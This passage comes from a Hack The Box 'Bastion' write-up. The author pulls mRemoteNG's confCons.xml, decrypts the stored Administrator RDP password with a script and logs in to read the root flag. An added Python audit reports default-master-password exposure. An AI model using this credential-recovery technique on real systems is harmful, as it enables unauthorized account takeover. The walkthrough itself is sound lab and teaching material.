22-02-2019  15:03             6.318 confCons.xml.20190222-1403220026.backup                                                     
22-02-2019  15:03             6.315 confCons.xml.20190222-1403261268.backup                                                     
22-02-2019  15:03             6.316 confCons.xml.20190222-1403272831.backup                                                     
22-02-2019  15:03             6.315 confCons.xml.20190222-1403433299.backup                                                     
22-02-2019  15:03             6.316 confCons.xml.20190222-1403486580.backup                                                     
22-02-2019  15:03                51 extApps.xml                                                                                 
22-02-2019  15:03             5.217 mRemoteNG.log                                                                               
22-02-2019  15:03             2.245 pnlLayout.xml                                                                               
22-02-2019  15:01    <DIR>          Themes                                                                                      
              14 File(s)         76.577 bytes                                                                                   
               3 Dir(s)  11.295.985.664 bytes free                                                                              

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>    

Let's use scp to get confCons.xml.

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ scp l4mpje@bastion.htb:/Users/L4mpje/AppData/Roaming/mRemoteNG/confCons.xml .
l4mpje@bastion.htb's password: 
confCons.xml                                                                                                                                                                                               100% 6316    38.2KB/s   00:00    
                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ cat confCons.xml 
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" 
InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
    <Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" 
InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ 

Examining confCons.xml, we get the following information:

 <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic"

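The Password value is base64-encoded, but decoding it does not give readable text: the root element shows the values are encrypted (EncryptionEngine="AES", BlockCipherMode="GCM", KdfIterations="1000"). The documentation mentions a script that does this magic for mRemoteNG.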

┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ python3 mremoteNG.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
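
The script succeeds because the AES-GCM settings in the file header only protect the stored values if a custom master password was set. The audit below is an added example, not part of the original writeup or of mRemoteNG; it reads a confCons.xml and reports that exposure without decrypting anything. The blob layout, the two Protected marker strings and the iteration threshold are assumptions labelled in the code, and SAMPLE is the file shown above trimmed to the attributes the check reads.

```python
import base64
import xml.etree.ElementTree as ET

# Assumed blob layout for mRemoteNG's AES-GCM values (taken from the public
# decrypt scripts, not from this page): salt(16) | nonce(16) | ciphertext | tag(16)
OVERHEAD = 16 + 16 + 16
# Assumption: the root Protected= attribute encrypts one of these two markers,
# so its plaintext length tells whether a custom master password was set.
MARKERS = {len("ThisIsNotProtected"): False, len("ThisIsProtected"): True}
MIN_KDF_ITERATIONS = 10000  # hypothetical policy threshold, adjust as needed

# The confCons.xml shown above, trimmed to the attributes this audit reads.
SAMPLE = """<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Username="Administrator" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" />
    <Node Name="L4mpje-PC" Type="Connection" Username="L4mpje" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" />
</mrng:Connections>"""


def secret_len(b64_value):
    """Plaintext length in bytes implied by a stored value (GCM adds no padding)."""
    raw = base64.b64decode(b64_value)
    if len(raw) < OVERHEAD:
        raise ValueError("value too short for salt|nonce|ciphertext|tag")
    return len(raw) - OVERHEAD


def audit(xml_text):
    """Summarise what a reader of this file can see or recover; nothing is decrypted."""
    root = ET.fromstring(xml_text)
    protected = root.get("Protected")
    report = {
        "custom_master_password": MARKERS.get(secret_len(protected)) if protected else None,
        "full_file_encryption": root.get("FullFileEncryption", "false").lower() == "true",
        "kdf_iterations": int(root.get("KdfIterations", "0")),
        "stored": [],
        "findings": [],
    }
    for node in root.iter("Node"):  # iter() also walks nodes nested in containers
        if node.get("Password"):
            report["stored"].append((node.get("Name"), node.get("Username"),
                                     node.get("Hostname"), secret_len(node.get("Password"))))
    if report["stored"] and report["custom_master_password"] is False:
        report["findings"].append(
            "saved passwords are protected only by the built-in default master password")
    if not report["full_file_encryption"]:
        report["findings"].append(
            "FullFileEncryption is off: usernames and hostnames are readable")
    if report["kdf_iterations"] < MIN_KDF_ITERATIONS:
        report["findings"].append(
            f"KdfIterations={report['kdf_iterations']} is below {MIN_KDF_ITERATIONS}")
    return report


if __name__ == "__main__":
    result = audit(SAMPLE)
    for name, user, host, length in result["stored"]:
        print(f"{name}: password stored for {user}@{host} ({length} bytes)")
    for finding in result["findings"]:
        print("FINDING:", finding)
```

A file that produces the first finding should be treated as holding recoverable credentials: password-protect the connections file in mRemoteNG and rotate everything it stored.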

Now we have the admin password, so let's get the root flag.

                                                                                                                                                                                                                                             
┌──(abhinav㉿ETHICALHACKX)-[~/htb/basiton]
└─$ ssh administrator@bastion.htb
administrator@bastion.htb's password: 

Microsoft Windows [Version 10.0.14393]                                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                                            

administrator@BASTION C:\Users\Administrator>dir                                                                                
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\Administrator                                                                                            

25-04-2019  06:08    <DIR>          .                                                                                           
25-04-2019  06:08    <DIR>          ..                                                                                          
23-02-2019  10:40    <DIR>          Contacts                                                                                    
23-02-2019  10:40    <DIR>          Desktop                                                                                     
23-02-2019  10:40    <DIR>          Documents                                                                                   
23-02-2019  10:40    <DIR>          Downloads                                                                                   
23-02-2019  10:40    <DIR>          Favorites                                                                                   
23-02-2019  10:40    <DIR>          Links                                                                                       
23-02-2019  10:40    <DIR>          Music                                                                                       
23-02-2019  10:40    <DIR>          Pictures                                                                                    
23-02-2019  10:40    <DIR>          Saved Games                                                                                 
23-02-2019  10:40    <DIR>          Searches                                                                                    
23-02-2019  10:40    <DIR>          Videos                                                                                      
               0 File(s)              0 bytes                                                                                   
              13 Dir(s)  11.295.739.904 bytes free                                                                              

administrator@BASTION C:\Users\Administrator>cd desktop                                                                         

administrator@BASTION C:\Users\Administrator\Desktop>dir                                                                        
 Volume in drive C has no label.                                                                                                
 Volume Serial Number is 0CB3-C487                                                                                              

 Directory of C:\Users\Administrator\Desktop                                                                                    

23-02-2019  10:40    <DIR>          .                                                                                           
23-02-2019  10:40    <DIR>          ..                                                                                          
23-02-2019  10:07                32 root.txt                                                                                    
               1 File(s)             32 bytes                                                                                   
               2 Dir(s)  11.295.739.904 bytes free                                                                              

administrator@BASTION C:\Users\Administrator\Desktop>type root.txt                                                              
958850b91811676ed6620a9c430e65c8                                                                                                
administrator@BASTION C:\Users\Administrator\Desktop>     

We will try to include learning topics for each writeup going forward, and will update this one as well.
